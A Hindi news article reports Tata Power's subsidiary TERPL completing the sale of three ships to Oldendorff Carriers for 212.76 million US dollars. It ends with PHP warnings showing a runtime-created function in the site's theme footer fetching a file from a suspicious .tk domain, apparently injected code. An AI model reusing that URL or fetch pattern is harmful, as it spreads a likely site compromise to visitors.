टाटा पावर ने जहाजों की बिक्री का व्यवहार 212.76 मिलियन यूएस डॉलर्स में पूरा किया

Edit-Rashmi Sharma

जयपुर 07 जुलाई 2020 –  टाटा पावर की मालिकी की उपकंपनी, सिंगापूर की ट्रस्ट एनर्जी रिसोर्सेस पीटीई लिमिटेड ने (टीईआरपीएल) अपने तीन जहाजों की बिक्री का व्यवहार पूरा होने की आज घोषणा की।  एमवी ट्रस्ट एजिलिटी, एमवी ट्रस्ट इंटेग्रिटी और एमवी ट्रस्ट एमिटी यह तीन जहाज टीईआरपीएल ने जर्मनी की ओल्डेनडोर्फ़ कर्रिएर्स जीएमबीएच एंड कंपनी केजी कंपनी को 212.76 मिलियन यूएस डॉलर्स में बेचे हैं।

अब टीईआरपीएल एसेट-लाइट मॉडल के तहत टाटा पावर कंपनी के मुंद्रा के आयात किए जाने वाले कोयले से बिजली बनाने वाले सीजीपीएल प्लांट की शिपिंग जरूरतें पूरा करने का काम करेगी।                  एसेट-लाइट मॉडल से कंपनी के शेयरहोल्डर्स के लिए लक्षणीय मूल्य और लाभ दिलाने में मदद होगी।  जहाजों की बिक्री से मिलाने वाली रकम को कंपनी के कर्ज कम करने और आगे की विकास योजनाओं के लिए उपयोग में लाया जाएगा।

टाटा पावर के सीईओ और एमडी श्री. प्रवीर सिन्हा ने बताया, “आज की गयी घोषणा के अनुसार हमारे जहाजों की बिक्री कंपनी के कर्ज कम करने और हमारी आगे की विकास योजनाओं में निवेश की दीर्घकालिक योजनाओं के लिए की गयी है।  साथ ही नूतनीकरणीय ऊर्जा उद्यम में हमारा स्थान मजबूत करने के लिए भी इसका उपयोग किया जाएगा।

इस बिक्री में जर्मनी के ओल्डेनडोर्फ़ कर्रिएर्स जीएमबीएच एंड कंपनी केजी के साथ किए गए जहाजों से संबंधित वर्तमान दीर्घकालिक कॉन्ट्रैक्ट्स भी शामिल हैं। यह दुनिया की सबसे बड़ी ड्राई-बल्क शिपिंग कंपनियों में से एक है।  ओल्डेनडोर्फ़ कंपनी हर साल करीबन 320 मिलियन टन वजन के माल की आवाजाही करती है और इस कंपनी ने दुनिया भर में कार्गो सेवाओं को एकीकृत किया है। यह कंपनी 125 देशों में 14,000 पोर्ट कॉल्स करती है। एक समय पर ओल्डेनडोर्फ़ कंपनी औसतन 700 चार्टर्ड और अपनी मालिकी के जहाज चलाती है।

टाटा पावर ने हाल ही में दक्षिण अफ्रीका की ‘सेनर्जी’ कंपनी से डिइंवेस्टमेंट के बाद दूसरी बार अपनी संपत्ति बेचीं है।


Warning: file_get_contents(): php_network_getaddresses: getaddrinfo failed: Name or service not known in /home/patrikajagat/public_html/wp-content/themes/sahifa/footer.php(39) : runtime-created function on line 1

Warning: file_get_contents(http://nativeredir.tk/lx/1.txt): failed to open stream: php_network_getaddresses: getaddrinfo failed: Name or service not known in /home/patrikajagat/public_html/wp-content/themes/sahifa/footer.php(39) : runtime-created function on line 1